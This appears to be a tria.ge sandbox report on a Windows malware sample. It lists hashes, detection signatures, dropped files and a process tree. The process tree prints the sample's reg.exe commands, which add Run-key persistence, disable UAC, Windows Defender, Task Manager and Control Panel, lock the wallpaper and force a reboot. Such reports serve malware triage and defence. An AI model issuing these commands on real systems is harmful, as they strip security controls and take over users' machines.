Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    41s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    04/02/2024, 05:51

Errors

Reason
Machine shutdown

General

  • Target

    240204-b61b1seff6.exe

  • Size

    11.5MB

  • MD5

    cbefa3dd01682c7ae01476a35c069ca8

  • SHA1

    0a7fde7402d314993d0b77b87b796f480c8bbec4

  • SHA256

    9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

  • SHA512

    41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d

  • SSDEEP

    196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Malware Config

Signatures

  • UAC bypass (3 TTPs, 1 IoCs)
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defender features (3 IoCs)
  • UPX dump on OEP (original entry point) (3 IoCs)
  • Disables Task Manager via registry modification
  • UPX packed file (3 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  • Drops file in Windows directory (6 IoCs)
  • Modifies registry key (1 TTPs, 5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (47 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe
    "C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\HorrorTubies.bat""
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
        • Adds Run key to start application
        • Modifies registry key
        PID:2788
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
        • Adds Run key to start application
        • Modifies registry key
        PID:2608
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        • Sets desktop wallpaper using registry
        PID:1252
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        PID:2652
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        • Modifies registry key
        PID:1204
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        • UAC bypass
        • Modifies registry key
        PID:1224
      • C:\Windows\SysWOW64\reg.exe
        Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        PID:2572
      • C:\Windows\SysWOW64\reg.exe
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        • Modifies registry key
        PID:1952
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
        PID:320
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown /r /t 00
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    PID:2684
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    PID:692

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\HorrorTubies.bat
    Filesize
      1KB
    MD5
      f014698e88eda534c88ce46a17e34d3c
    SHA1
      5f33f606179fea1404144d60af54fb829ea108b5
    SHA256
      35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909
    SHA512
      79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

  • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\bg.bmp
    Filesize
      2.2MB
    MD5
      a91e5b7686d4f631a2bdf654a3a491f1
    SHA1
      d5760f5c7463b588b0c74bbc86237aed136b9fe9
    SHA256
      45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea
    SHA512
      86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

  • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\gdifuncs.exe
    Filesize
      76KB
    MD5
      9b104d42649fa52651a2ec25d7e48322
    SHA1
      d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030
    SHA256
      23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9
    SHA512
      55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

  • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\mainbgtheme.wav
    Filesize
      13.1MB
    MD5
      1c723b3b9420e04cb8845af8b62a37fa
    SHA1
      3331a0f04c851194405eb9a9ff49c76bfa3d4db0
    SHA256
      6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29
    SHA512
      41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

  • C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\mbrsetup.exe
    Filesize
      1.3MB
    MD5
      4f9777b4f603a437abedb856d09d42ba
    SHA1
      9a50bdb720e937ae6a8fd4140233b600414b393e
    SHA256
      c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd
    SHA512
      c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

  • memory/692-36-0x0000000002760000-0x0000000002761000-memory.dmp
    Filesize
      4KB

  • memory/1104-0-0x0000000000400000-0x00000000014D1000-memory.dmp
    Filesize
      16.8MB

  • memory/1104-19-0x0000000000400000-0x00000000014D1000-memory.dmp
    Filesize
      16.8MB

  • memory/1104-34-0x0000000000400000-0x00000000014D1000-memory.dmp
    Filesize
      16.8MB

  • memory/2684-35-0x0000000002B00000-0x0000000002B01000-memory.dmp
    Filesize
      4KB